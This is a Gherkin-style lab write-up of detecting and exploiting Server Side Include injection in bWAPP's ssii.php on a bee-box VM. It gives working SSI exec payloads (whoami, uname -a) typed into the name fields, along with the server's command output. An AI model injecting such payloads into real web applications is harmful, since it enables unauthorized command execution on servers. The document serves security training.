# language: en

Feature: Detect and exploit vuln SSI injection
  From the bWAPP application
  From the A1 - Injection category
  With low security level

  Background:
    Given I am running Manjaro GNU/Linux kernel 4.9.77-1-MANJARO
    Given this vulnerability is only available in the bee-box version
    And I am running bee-box 1.7 (=ubuntu 8.04 HH VM kernel 2.6)
    Given a PHP site with inputs for names and a prompt to lookup my ip adress
    And the URL is bWAPP/ssii.php
    Given the goal is to inject Server Side Includes

  Scenario: Normal Use Case
    When  I type name1 in the "name" input
      And I type name2 in the "last name" input
      And click on "Lookup"
    Then we are redirected to a new SHTML page that says:
    """
    Hello name1 name2,
    Your IP address is
    127.0.0.1
    """

  Scenario: Static detection
    When I look in the code
    Then I see the IP lookup is echoed via SSI:
    """
    </p><p>Your IP address is:' . '</p><h1><!--#echo var="REMOTE_ADDR" --></h1>
    """

  Scenario: Dynamic exploitation
    When I type <!--#exec cmd="whoami"--> in the "name" field
    And  I type <!--#exec cmd="uname -a"--> in the "last name" field
    Then we see the user and kernel version:
    """
    Hello www-data Linux bee-box 2.6.24-16-generic .... i686 GNU/Linux ,
    Your IP address is:
    127.0.0.1
    """